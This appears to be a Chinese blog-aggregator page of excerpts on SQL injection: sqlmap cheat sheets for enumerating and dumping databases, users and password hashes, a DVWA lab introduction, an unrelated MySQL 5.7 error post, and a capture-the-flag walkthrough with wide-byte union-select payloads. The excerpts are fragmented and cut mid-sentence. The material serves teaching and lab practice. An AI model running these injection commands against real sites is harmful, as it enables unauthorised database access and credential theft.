sqlmap

sqlmap常用命令

倾然丶 夕夏残阳落幕 提交于 2019-12-02 19:14:23
--dbnms -- --common-tables 暴力猜表名 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –columns #列出字段 –current-user #获取当前用户名称 –current-db #获取当前数据库名称 –users #列数据库所有用户 –passwords #数据库用户所有密码 –privileges #查看用户权限(–privileges -U root) -U #指定数据库用户 –dbs #列出所有数据库 –tables -D “” #列出指定数据库中的表 –columns -T “user” -D “mysql” #列出mysql数据库中的user表的所有字段 –dump-all #列出所有数据库所有表 –exclude-sysdbs #只列出用户自己新建的数据库和表 –dump -T “数据库” -D “表” -C “字段” #列出指定数据库的表的字段的数据(–dump -T users -D master -C

mysql从5.6升级到5.7后出现 Expression #1 of ORDER BY clause is not in SELECT list,this is incompatible with DISTINCT

匆匆过客 提交于 2019-12-02 18:33:34
【问题】 mysql从5.6升级到5.7后出现:插入数据和修改数据时出错 Caused by: com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred while applying a parameter map. --- Check the findOrderList-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: Expression #1 of ORDER BY clause is not in SELECT list, references column 'ddfei.t2.add_time' which is not in SELECT list; this is incompatible with DISTINCT at com.ibatis.sqlmap.engine.mapping.statement.MappedStatement.executeQueryWithCallback(MappedStatement.java:201) at com.ibatis.sqlmap.engine.mapping.statement

(九)DVWA之SQL Injection--SQLMap&Fiddler测试(High)

爱⌒轻易说出口 提交于 2019-12-02 15:31:29
一、测试需求分析 测试对象 :DVWA漏洞系统--SQL Injection模块--ID提交功能 防御等级 :High 测试目标 :判断被测模块是否存在SQL注入漏洞,漏洞是否可利用,若可以则检测出对应的数据库数据 测试方式 :手工+Fiddler+ SQLMap工具 url: http://localhost:8001/dvwa/vulnerabilities/sqli/ 被测模块(防御:High) session-input.php代码 <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page = dvwaPageNewGrab(); $page[ 'title' ] = 'SQL Injection Session Input' . $page[ 'title_separator' ].$page[ 'title' ]; if( isset( $_POST[ 'id' ] ) ) { $_SESSION[ 'id' ] = $_POST[ 'id' ]; //$page[

Sqlmap常用命令

不想你离开。 提交于 2019-12-02 15:24:27
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点 2. --dbs 【检测站点包含哪些数据库 3. --current-db 【获取当前的数据库名 4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称 5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段 6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容 2#、COOKIE注入: sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 后接cookie值 3#、POST注入: (1)目标地址http:// www.xxx.com /login.asp (2)打开brup代理。 (3)点击表单提交 (4)burp获取拦截信息(post) (5)右键保存文件(.txt)到指定目录下 (6)运行sqlmap并执行如下命令: 用例:sqlmap -r okay.txt -p

SQLMAP参数介绍

牧云@^-^@ 提交于 2019-12-02 15:17:44
sqlmap的使用方式:python sqlmap.py [options]; sqlmap中一共有以下十六个选项卡: 帮助选项卡; Target(目标选项卡); Request(请求选项卡); Optimization(优化选项卡); Injection(注射选项卡); Detection(探测选项卡); Techniques(注入技术选项卡); Fingerprint(指纹选项卡); Enumeration(列数据选项卡); Brute force(爆破选项卡); User-defined function injection(用户自定义函数注入选项卡); File system access(系统文件操作选项卡); Operation system access(操作系统访问选项卡); Windows registry access(Windows注册表选项卡); General(一般选项卡); Miscellaneous(杂项); 1、帮助选项卡 -h, –help 显示基础的帮助信息并退出; -hh 显示进一步的帮助信息并退出; –version 显示程序的版本并退出; -v VERBOSE 详细级别:0-6(默认为1); 2、Target(目标选项卡):在这些选项卡中至少有一个要设置目标 -d DIRECT 直接连接到数据库; -u URL, –url=URL

Sqlmap的使用方法

安稳与你 提交于 2019-12-02 12:04:09
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs 爆当前数据库信息: sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --current-db 指定库名列出所有表 sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables# 'vhost48330' 为指定数据库名称 指定库名表名列出所有字段 sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns# 'admin' 为指定表名称 指定库名表名字段dump出指定字段 sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330

超详细SQLMap使用攻略及技巧

笑着哭i 提交于 2019-12-02 11:12:57
超详细SQLMap使用攻略及技巧 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站: http://sqlmap.org/ , 下载地址: https://github.com/sqlmapproject/sqlmap/zipball/master 演示视频: https://asciinema.org/a/46601 教程: http://www.youtube.com/user/inquisb/videos 1.1 sqlmap简介 sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。 sqlmap支持五种不同的注入模式: l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入; l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行

SQLMap中tamper的简介

流过昼夜 提交于 2019-12-02 03:36:30
目录结构 一、SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二、适配不同数据库类型的测试tamper 三、SQLMap中tamper篡改脚本的功能解释 一、SQLMap中tamper的简介 1.tamper的作用 使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。 部分防护系统的缩写: WAF:Web应用程序防火墙,Web Application Firewall IPS:入侵防御系统, Intrusion Prevention System IDS:入侵检测系统,Intrusion Detection System 2.tamper用法 --tamper=TAMPER 利用给定的脚本进行篡改注入数据。其用法可举例说明: python sqlmap.py -u "http://.../?uname=admin&pwd=pass123" --level=5 --risk=3 -p "uname" --tamper=xxx.py 表示对指定的url地址,以所设置的level等级、risk等级,并采用选定的tamper篡改脚本对参数“uname”进行检测 二、适配不同数据库类型的测试tamper 当使用SQLMap篡改脚本执行渗透测试时,面对众多tamper可能会比较困惑

SQL过滤字符 sqlmap自动注入

▼魔方 西西 提交于 2019-12-02 03:35:12
IP地址 : 219.153.49.228 端口 : 41167 协议 : http sqlmap -u http://219.153.49.228:43477/new_list.php?id=1 --tamper charencode,equaltolike,space2comment --dbs sqlmap -u http://219.153.49.228:43477/new_list.php?id=1 --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --batch --dump 来源: https://www.cnblogs.com/flawlessm/p/11729212.html

(宽字节注入) 手注+sqlmap

断了今生、忘了曾经 提交于 2019-12-02 03:29:48
进入题目后先简单尝试一下。 很明显的宽字节注入。 宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码. 手工注入 1、判断列数: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23 order by 3 时报错,说明只有两列。 2、各类信息: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23 sae-chinalover@123.125.23.212 : sae-chinalover : 5.5.52-0ubuntu0.14.04.1 3、库名: http://chinalover.sinaapp.com/SQL-GBK/index.php